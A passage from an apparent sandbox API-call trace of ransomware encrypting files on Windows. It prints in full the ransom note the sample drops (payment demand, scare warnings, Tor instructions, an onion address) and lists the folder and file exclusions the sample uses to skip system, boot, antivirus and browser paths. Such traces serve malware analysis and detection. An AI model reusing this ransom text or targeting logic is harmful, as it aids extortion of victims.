hFindFile=0x9ad478, lpFindFileData=0x2d7e3bc | out: lpFindFileData=0x2d7e3bc) returned 0 [0148.302] GetLastError () returned 0x12 [0148.302] FindClose (in: hFindFile=0x9ad478 | out: hFindFile=0x9ad478) returned 1 [0148.302] _wfopen (_FileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\bg-BG\\Recovers your files.html" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\bg-bg\\recovers your files.html"), _Mode="w") returned 0x77ac1268 [0148.303] fputs (in: _Str=" Encrypted files!

Your Key: a8ba77dad846516d1a6737c4237beea3b25e325279bbf473010960209657e13a

Encrypted files!

All your files are encrypted.Using AES256-bit encryption and RSA-2048-bit encryption.
Making it impossible to recover files without the correct private key.
If you are interested in getting is the key and recover your files
You should proceed with the following steps.

The only way to decrypt your files safely is to buy the Descrypt and Private Key software.

Any attempts to restore your files with the third-party software will be fatal for your files!

Important use Firefox or Chrome browser

To proceed with the purchase you must access one of the link below

If neither of the links is online for a long period of time, there is another way to open it, you should install the Tor Browser

If your personal page is not available for a long period there is another way to open your personal page - installation and use of Tor Browser:

  1. run your Internet browser (if you do not know what it is run the Internet Explorer);
  2. enter or copy the address https://www.torproject.org/download/download-easy.html.en into the address bar of your browser and press ENTER;
  3. wait for the site loading;
  4. on the site you will be offered to download Tor Browser; download and run it, follow the installation instructions, wait until the installation is completed;
  5. run Tor Browser;
  6. connect with the button 'Connect' (if you use the English version);
  7. a normal Internet browser window will be opened after the initialization;
  8. type or copy the address

    https://lylh3uqyzay3lhrd.onion

    in this browser address bar;
  9. press ENTER;
  10. the site should be loaded; if for some reason the site is not loading wait for a moment and try again.
If you have any problems during installation or use of Tor Browser, please, visit https://www.youtube.com and type request in the search bar 'Install Tor Browser Windows' and you will find a lot of training videos about Tor Browser installation and use.

Your Key: a8ba77dad846516d1a6737c4237beea3b25e325279bbf473010960209657e13a
", _File=0x77ac1268 | out: _File=0x77ac1268) returned 0 [0148.303] fclose (in: _File=0x77ac1268 | out: _File=0x77ac1268) returned 0 [0148.304] wcslen (_String="Unfortunately crypted files: ") returned 0x1d [0148.304] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0148.304] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0148.304] wcslen (_String="Fortunately ignored files because of filters: ") returned 0x2e [0148.304] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0148.304] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0148.304] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\cs-CZ\\*", pszSpec="*.exe") returned 0 [0148.304] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\cs-CZ\\*", pszSpec="*.dll") returned 0 [0148.304] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\cs-CZ\\*", pszSpec="*.lnk") returned 0 [0148.304] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\cs-CZ\\*", pszSpec="*.bat") returned 0 [0148.304] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\cs-CZ\\*", pszSpec="*.ini") returned 0 [0148.304] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\cs-CZ\\*", pszSpec="*.msi") returned 0 [0148.304] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\cs-CZ\\*", pszSpec="*.scf") returned 0 [0148.304] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\cs-CZ\\*", pszSpec="*pagefile.sys*") returned 0 [0148.304] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\cs-CZ\\*", pszSpec="*NTUSER.DAT*") returned 0 [0148.304] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\cs-CZ\\*", pszSpec="*AppData*") returned 0 [0148.304] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\cs-CZ\\*", pszSpec="*\\winrar\\*") returned 0 [0148.304] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\cs-CZ\\*", pszSpec="*\\Internet Explorer\\*") returned 0 [0148.304] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\cs-CZ\\*", pszSpec="*\\java\\*") returned 0 [0148.304] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\cs-CZ\\*", pszSpec="*\\TeamViewer\\*") returned 0 [0148.304] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\cs-CZ\\*", pszSpec="*\\windows\\*") returned 0 [0148.304] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\cs-CZ\\*", pszSpec="*\\ESET\\*") returned 0 [0148.304] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\cs-CZ\\*", pszSpec="*\\AVG\\*") returned 0 [0148.304] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\cs-CZ\\*", pszSpec="*\\AVIRA\\*") returned 0 [0148.304] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\cs-CZ\\*", pszSpec="*\\AVAST Software\\*") returned 0 [0148.304] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\cs-CZ\\*", pszSpec="*Atheros*") returned 0 [0148.304] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\cs-CZ\\*", pszSpec="*Realtek*") returned 0 [0148.304] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\cs-CZ\\*", pszSpec="*bootmgr*") returned 0 [0148.304] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\cs-CZ\\*", pszSpec="*boot*") returned 0 [0148.304] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\cs-CZ\\*", pszSpec="*boot*") returned 0 [0148.304] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\cs-CZ\\*", pszSpec="*CONFIG.SYS*") returned 0 [0148.304] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\cs-CZ\\*", pszSpec="*IO.SYS*") returned 0 [0148.304] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\cs-CZ\\*", pszSpec="*MSDOS.SYS*") returned 0 [0148.304] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\cs-CZ\\*", pszSpec="*NTDETECT.COM*") returned 0 [0148.304] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\cs-CZ\\*", pszSpec="*ntldr*") returned 0 [0148.304] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\cs-CZ\\*", pszSpec="*chrome*") returned 0 [0148.304] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\cs-CZ\\*", pszSpec="*opera*") returned 0 [0148.304] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\cs-CZ\\*", pszSpec="*firefox*") returned 0 [0148.304] wcslen (_String="\\\\?\\") returned 0x4 [0148.304] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\cs-CZ\\*", lpFindFileData=0x2d7e3bc | out: lpFindFileData=0x2d7e3bc) returned 0x9ad338 [0148.305] wcscmp (_String1=".", _String2=".") returned 0 [0148.305] FindNextFileW (in: hFindFile=0x9ad338, lpFindFileData=0x2d7e3bc | out: lpFindFileData=0x2d7e3bc) returned 1 [0148.305] wcscmp (_String1="..", _String2=".") returned 1 [0148.305] wcscmp (_String1="..", _String2="..") returned 0 [0148.305] FindNextFileW (in: hFindFile=0x9ad338, lpFindFileData=0x2d7e3bc | out: lpFindFileData=0x2d7e3bc) returned 1 [0148.305] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*NMCRYPT") returned 0 [0148.305] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*Recovers your files.html") returned 0 [0148.305] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*.exe") returned 0 [0148.305] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*.dll") returned 0 [0148.305] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*.lnk") returned 0 [0148.305] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*.bat") returned 0 [0148.305] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*.ini") returned 0 [0148.305] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*.msi") returned 0 [0148.305] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*.scf") returned 0 [0148.305] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*pagefile.sys*") returned 0 [0148.305] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*NTUSER.DAT*") returned 0 [0148.305] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*AppData*") returned 0 [0148.305] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\winrar\\*") returned 0 [0148.305] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\Internet Explorer\\*") returned 0 [0148.305] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\java\\*") returned 0 [0148.305] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\TeamViewer\\*") returned 0 [0148.305] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\windows\\*") returned 0 [0148.305] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\ESET\\*") returned 0 [0148.305] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\AVG\\*") returned 0 [0148.305] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\AVIRA\\*") returned 0 [0148.305] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\AVAST Software\\*") returned 0 [0148.305] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*Atheros*") returned 0 [0148.305] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*Realtek*") returned 0 [0148.306] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*bootmgr*") returned 0 [0148.306] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*boot*") returned 0 [0148.306] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*boot*") returned 0 [0148.306] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*CONFIG.SYS*") returned 0 [0148.306] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*IO.SYS*") returned 0 [0148.306] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*MSDOS.SYS*") returned 0 [0148.306] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*NTDETECT.COM*") returned 0 [0148.306] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*ntldr*") returned 0 [0148.306] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*chrome*") returned 0 [0148.306] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*opera*") returned 0 [0148.306] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*firefox*") returned 0 [0148.306] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\cs-CZ\\tipresx.dll.mui", pszSpec="*") returned 1 [0148.306] strlen (_Str="NMoreira") returned 0x8 [0148.306] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.306] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.306] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.306] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.306] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.306] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.306] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.306] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.306] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.306] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.306] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.306] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.306] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.306] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.306] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.306] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.306] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.306] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.306] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.306] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.306] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.306] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.306] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.306] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.306] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.306] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.306] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.306] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.306] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.306] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.306] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.306] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.306] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.307] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.307] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.307] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.307] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.307] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.307] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.307] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.307] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.307] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.307] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.307] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.307] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.307] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.307] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.307] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.307] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.307] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.307] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.307] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.307] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.307] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.307] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.307] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.307] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.307] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.307] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.307] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.307] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.307] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.307] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.307] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.307] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.307] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.307] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.307] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.307] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.307] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.307] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.307] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.307] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.307] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.307] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.307] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.307] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.307] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.307] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.307] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.307] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.307] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.307] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.308] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.308] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.308] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.308] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.308] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.308] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.308] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.308] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.308] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.308] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.308] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.308] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.308] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.308] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.308] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.308] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.308] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.308] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.308] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.308] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.308] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.308] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.308] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.308] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.308] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.308] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.308] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.308] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.308] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.308] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.308] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.308] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.308] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.308] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.308] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.308] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.308] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: 